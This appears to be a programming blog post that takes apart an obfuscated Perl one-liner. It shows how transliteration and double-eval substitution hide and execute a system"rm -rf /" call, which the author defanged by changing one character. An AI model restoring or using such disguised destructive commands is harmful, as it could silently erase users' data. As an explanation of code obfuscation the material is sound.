A bit of perl trickery

I wanted to understand how this snippet worked, and now I do, but at what cost? I have stared too long into perl's abyss, and now it stares back.


A Professional Tester, through back channels and chicanery, made me aware of an ancient perl evil of the form:

perl -e '$??s:;s:s;;$?::s;;]]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Don't worry - I changed one character to avoid DISASTROUS CONSEQUENCES. If you ran the real version, you would be dealing with rm -rf / and your day would be ruined.

But, for real: how do you get rm -rf / out of that junk? Aside: the collective noun for "perl statement" is "a headache".

Perl is meant to be flexible. Like, too flexible

Let's start somewhere in the middle.

You might be familiar with replacements on text using regular expressions, perhaps something like $my_text =~ s/this/that/g, which will replace instances of this in a string with that.

Perl (like a few other languages) has some alternate syntaxes for these regex operations. In the case of our evil code, they look like this: s;this;that;g, replacing the slashes with semicolons. You might want to use that if you're dealing with HTML and a lot of the text you're working with has / throughout. You don't have to escape slashes if your delimiters are semicolons, which makes the regular expressions easier to parse, slightly.
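
If you'd rather see the delimiter swap than take my word for it, here is a minimal sketch. The sample text and variable names are made up for illustration; only the two spellings of the substitution matter.

```perl
use strict;
use warnings;

# Hypothetical sample text containing plenty of slashes.
my $with_slashes    = 'see /usr/bin and /usr/lib';
my $with_semicolons = $with_slashes;

# Slash delimiters: every literal / in the pattern and replacement is escaped.
$with_slashes =~ s/\/usr\//\/opt\//g;

# Semicolon delimiters: the same substitution, no escaping needed.
$with_semicolons =~ s;/usr/;/opt/;g;

print "$with_slashes\n";     # see /opt/bin and /opt/lib
print "$with_semicolons\n";  # see /opt/bin and /opt/lib
```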

So! Look at this code:


s;;]]=>%-{<-|}<&|`{;;

# ... is the same as:
s//]]=>%-{<-|}<&|`{/;

# ... is the same as:
$_ =~ s//]]=>%-{<-|}<&|`{/;

$_ is kind of the default variable in perl. Many functions operate on that variable by convention. Oh, and that final semicolon there, that's just a semicolon. We're passing a few different statements to the interpreter, and those statements are delimited by semicolons, just like you'd find at the end of a line of code in a reasonable programming language.

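Okay, so what this line does is take $_ (which starts out empty), match the empty string at the very start of it (i.e. the contents between the first two slashes in s//[stuff]/ ), and replace that match with various punctuation and symbols (i.e. the contents between the second two slashes). There's no g flag, so only that first match is replaced. The net effect: $_ now holds the punctuation.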
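
Here is a small sketch of that "substitute nothing with something" trick, using a harmless placeholder word instead of the punctuation. It assumes $_ starts out empty, as it does at the top of a fresh perl -e.

```perl
use strict;
use warnings;

# An empty string stands in for the untouched $_ of a fresh perl -e.
$_ = '';

# Empty pattern, no g flag: one match at position 0, replaced by the payload.
# 'hello' is a harmless placeholder for the punctuation soup.
s;;hello;;

print "$_\n";  # hello
```

In other words, the substitution is just a roundabout assignment to $_.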

On to the next statement!

perl: The Write-Only language

Much like s/this/that/g, the y operator looks like another regex doodad, but it isn't regex-based at all. It's an alternate spelling of the tr operator (borrowed from sed), which translates one set of characters to another, character by character.

So if you have a string I like bats and run it through tr/abt/odg/ you will get I like dogs, with the tr operation replacing all instances of a with o, b with d, and so on. How's that for a forced example!
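
The forced example runs as written. A minimal sketch, with variable names invented for illustration:

```perl
use strict;
use warnings;

my $text = 'I like bats';

# a -> o, b -> d, t -> g; every other character is left alone.
(my $translated = $text) =~ tr/abt/odg/;

# y is just another spelling of tr.
(my $same = $text) =~ y/abt/odg/;

print "$translated\n";  # I like dogs
print "$same\n";        # I like dogs
```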

To the code!

y; -/:-@[-`{-};`-{/" -;;

# ... is the same as:
tr/ -\/:-@[-`{-}/`-{\/" -/; # notice the escaped / characters!

# ... is the same as:
$_ =~ tr/ -\/:-@[-`{-}/`-{\/" -/;

... which is still very nearly inscrutable!

The tr operator can take ranges of characters, so you can say something like tr/a-z/n-za-m/ to get a ROT13 encoder/decoder! That expression may look unbalanced, but a-z has 26 characters; n-z and a-m both have 13 characters for a total of 26.
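
A quick sketch of that ROT13 round trip, lowercase only, since the expression above only covers a-z. The sample word is arbitrary.

```perl
use strict;
use warnings;

my $secret = 'hello';

# Applying the same translation twice gets you back where you started.
(my $encoded = $secret)  =~ tr/a-z/n-za-m/;
(my $decoded = $encoded) =~ tr/a-z/n-za-m/;

print "$encoded\n";  # uryyb
print "$decoded\n";  # hello
```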

But here we're not doing ranges of, say, alphanumeric characters. We're doing ranges of ASCII nonsense. The first range after the tr is the range between the space character and the forward slash,  -/, which, if you remember your ASCII tables, covers the decimal values 32-47, or the characters: SP ! " # $ % & ' ( ) * + , - . / (where SP is the space character).

Going through all the ranges:

y; -/:-@[-`{-};`-{/" -;;
# ^ ^
# space to slash:  !"#$%&'()*+,-./

y; -/:-@[-`{-};`-{/" -;;
#    ^ ^
# colon to @: :;<=>?@

y; -/:-@[-`{-};`-{/" -;;
#       ^ ^
# [ to `: [\]^_`

y; -/:-@[-`{-};`-{/" -;;
#          ^ ^
# { to }: {|}

y; -/:-@[-`{-};`-{/" -;;
#              ^ ^
# backtick to {: `abcdefghijklmnopqrstuvwxyz{

y; -/:-@[-`{-};`-{/" -;;
#                 ^  ^
# these characters are not a range, just literals
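
The range expansion above can be reproduced with a few lines of perl. This is only a sketch: expand() is a hypothetical helper written for this post, not a builtin, and it mimics what tr does with X-Y ranges by walking the character codes.

```perl
use strict;
use warnings;

# Expand an inclusive character range into a string,
# e.g. expand('a', 'e') gives 'abcde'. Hypothetical helper, not a builtin.
sub expand {
    my ($from, $to) = @_;
    return join '', map { chr($_) } (ord($from) .. ord($to));
}

# Left-hand side of the y operator: four ranges.
my $search = expand(' ', '/') . expand(':', '@') . expand('[', '`') . expand('{', '}');

# Right-hand side: one range, then four literal characters.
my $replace = expand('`', '{') . '/" -';

print length($search), "\n";   # 32
print length($replace), "\n";  # 32
print "$replace\n$search\n";
```

Both sides come out at 32 characters, which is what lets every character on one side pair up with exactly one on the other.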

Finally we can see how the substitution works:

# this puts the encoded message into $_
$_ =~ s//]]=>%-{<-|}<&|`{/;

# this is the translation that decodes the message:
$_ =~ tr/ -\/:-@[-`{-}/`-{\/" -/;

# which, if you de-obfuscate the ranges, you get the key:
# `abcdefghijklmnopqrstuvwxyz{/" -
#  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}

Looking at the encoded message, which starts with ]]=>%- , we can start to decode by finding the encoded character in the second row of the key, then looking at the corresponding character above it for its decoded value:

  • ] translates to y
  • ] translates to y
  • = translates to s
  • > translates to t
  • % translates to e
  • - translates to m

So the full translation is yystem"rm -rf /". Which would be dangerous, had I not changed the first character.
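
You can check that decoding by machine without running anything dangerous. The sketch below applies the same translation to the defanged string and only prints the result. It never hands the decoded text to eval or system, and you shouldn't either.

```perl
use strict;
use warnings;

# The defanged payload from the one-liner, single-quoted so nothing interpolates.
my $encoded = ']]=>%-{<-|}<&|`{';

# Same transliteration as the one-liner, semicolon delimiters and all.
(my $decoded = $encoded) =~ y; -/:-@[-`{-};`-{/" -;;

# Print only. The decoded text is never evaluated or executed.
print "$decoded\n";  # yystem"rm -rf /"
```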

But how does execution work?

In perl, the system function executes its arguments as shell commands outside of the perl context. In this case, it runs rm -rf / as though from a command prompt. Which is bad.

But how does it actually do it?

Once again, we look at the s operator in the final few characters of the codelet: s;;$_;see. We already know this code is substituting the empty string with the value of $_, which is system"rm -rf /", but what of that see on the end?

The s modifier tells perl to treat everything as a single line of text (it lets . match newlines). There's no . in this pattern, so I think in this case it was only added to further confuse. The e modifier evaluates the right side of the substitution as perl code, and doubling it to ee then evaluates the output of that evaluation: the first e looks at $_ and evaluates it to system"rm -rf /", and the second e executes system"rm -rf /".
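
To see the difference between no e, one e, and two without risking anything, here is a sketch that swaps the payload for a bit of harmless arithmetic. The variable names and the '6 * 7' string are stand-ins of my own.

```perl
use strict;
use warnings;

# A harmless stand-in for the decoded payload: a string containing perl code.
my $code = '6 * 7';

# No modifier: the replacement is an interpolated string, so $code is pasted in.
(my $none = 'x') =~ s/x/$code/;

# One e: the replacement is a perl expression; evaluating $code yields its string value.
(my $once = 'x') =~ s/x/$code/e;

# Two e's: the string from the first evaluation is itself evaluated as perl code.
(my $twice = 'x') =~ s/x/$code/ee;

print "$none\n";   # 6 * 7
print "$once\n";   # 6 * 7
print "$twice\n";  # 42
```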

Et voilà.

But what about the first stuff?

Right! There's still the $??s:;s:s;;$?:: nonsense.

Spreading that out, it's a ternary statement:

$??s:;s:s;;$?::# the rest

# ... is the same as:
$? ? s:;s:s;;$?: : # the rest

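# ... is the same as:
if ($? != 0) {
  s:;s:s;;$?:; # or, per earlier, s/;s/s;;$?/
} else {
  s;;]]=>%-{<-|}<&|`{;; # the first statement of "the rest"
}

... The special variable $? holds the status of the last child process, and nothing has run yet, so it is 0 and the else branch always wins. All that to say, you can omit that part and it doesn't change the behavior of the snippet.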
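
A small sketch of why the ternary is dead weight. It assumes no child process has run yet, so $? is still 0. 'skipped' and 'loaded' are placeholder strings standing in for the two substitutions.

```perl
use strict;
use warnings;

$_ = '';

# $? holds the status of the last child process; none has run, so it is 0
# and the branch after the colon is the one that executes.
$? ? s//skipped/ : s//loaded/;

print "$?\n";  # 0
print "$_\n";  # loaded
```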

Gosh, what an adventure

I have no conclusion for this one. I wanted to understand how this snippet worked, and now I do, but at what cost? I have stared too long into perl's abyss, and now I worry that it stares back.

perl -e '$??s:;s:s;;$?::s;;:<).>{-)+%|)=|![%=/-%{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'